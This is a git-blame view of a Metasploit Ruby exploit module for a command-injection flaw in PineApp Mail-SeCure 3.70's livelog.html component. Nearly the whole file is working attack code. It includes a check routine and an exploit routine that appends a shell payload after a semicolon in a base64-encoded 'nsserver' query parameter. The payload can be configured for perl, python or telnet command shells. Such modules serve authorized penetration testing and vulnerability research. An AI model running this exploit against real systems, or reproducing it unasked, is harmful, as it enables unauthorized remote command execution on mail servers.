Files
metasploit-gs/modules/exploits/linux/http/pineapp_livelog_exec.rb
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

101 lines
2.9 KiB
Ruby
Raw Normal View History

2013-07-28 09:57:41 -05:00
##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
2013-07-28 09:57:41 -05:00
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-07-28 09:57:41 -05:00
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
2025-06-20 13:20:44 +01:00
super(
update_info(
info,
'Name' => 'PineApp Mail-SeCure livelog.html Arbitrary Command Execution',
'Description' => %q{
2013-07-28 09:57:41 -05:00
This module exploits a command injection vulnerability on PineApp Mail-SeCure
2025-06-20 13:20:44 +01:00
3.70. The vulnerability exists on the livelog.html component, due to the insecure
usage of the shell_exec() php function. This module has been tested successfully
on PineApp Mail-SeCure 3.70.
},
'Author' => [
'Unknown', # Vulnerability discovery
2013-07-28 09:57:41 -05:00
'juan vazquez' # Metasploit module
],
2025-06-20 13:20:44 +01:00
'License' => MSF_LICENSE,
'References' => [
2013-10-21 15:07:07 -05:00
[ 'ZDI', '13-184'],
[ 'OSVDB', '95779']
2013-07-28 09:57:41 -05:00
],
2025-06-20 13:20:44 +01:00
'Platform' => ['unix'],
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'Space' => 1024,
2013-07-28 09:57:41 -05:00
'DisableNops' => true,
2025-06-20 13:20:44 +01:00
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl python telnet'
}
2013-07-28 09:57:41 -05:00
},
2025-06-20 13:20:44 +01:00
'Targets' => [
[ 'PineApp Mail-SeCure 3.70', {}]
2013-07-28 09:57:41 -05:00
],
2025-06-20 13:20:44 +01:00
'DefaultOptions' => {
2013-07-28 09:57:41 -05:00
'SSL' => true
},
2025-06-20 13:20:44 +01:00
'DefaultTarget' => 0,
'DisclosureDate' => '2013-07-26',
'Notes' => {
2025-06-23 12:43:46 +01:00
'Reliability' => UNKNOWN_RELIABILITY,
'Stability' => UNKNOWN_STABILITY,
'SideEffects' => UNKNOWN_SIDE_EFFECTS
}
2025-06-20 13:20:44 +01:00
)
)
2013-07-28 09:57:41 -05:00
register_options(
[
Opt::RPORT(7443)
],
self.class
)
end
def my_uri
return normalize_uri("/livelog.html")
end
def check
res = send_request_cgi({
'uri' => my_uri,
'vars_get' => {
2025-06-20 13:20:44 +01:00
'cmd' => 'nslookup',
2013-07-28 09:57:41 -05:00
'nstype' => Rex::Text.encode_base64("A"),
'hostip' => Rex::Text.encode_base64("127.0.0.1"), # Using 127.0.0.1 in order to accelerate things with the legit command
'nsserver' => Rex::Text.encode_base64("127.0.0.1")
}
})
2014-01-22 11:20:10 -06:00
if res and res.code == 200 and res.body =~ /NS Query result for 127\.0\.0\.1/
2013-07-28 09:57:41 -05:00
return Exploit::CheckCode::Appears
end
2025-06-20 13:20:44 +01:00
2013-07-28 09:57:41 -05:00
return Exploit::CheckCode::Safe
end
def exploit
print_status("#{rhost}:#{rport} - Executing payload...")
send_request_cgi({
'uri' => my_uri,
'vars_get' => {
2025-06-20 13:20:44 +01:00
'cmd' => 'nslookup',
2013-07-28 09:57:41 -05:00
'nstype' => Rex::Text.encode_base64("A"),
'hostip' => Rex::Text.encode_base64("127.0.0.1"), # Using 127.0.0.1 in order to accelerate things with the legit command
'nsserver' => Rex::Text.encode_base64("127.0.0.1;#{payload.encoded}")
}
})
end
end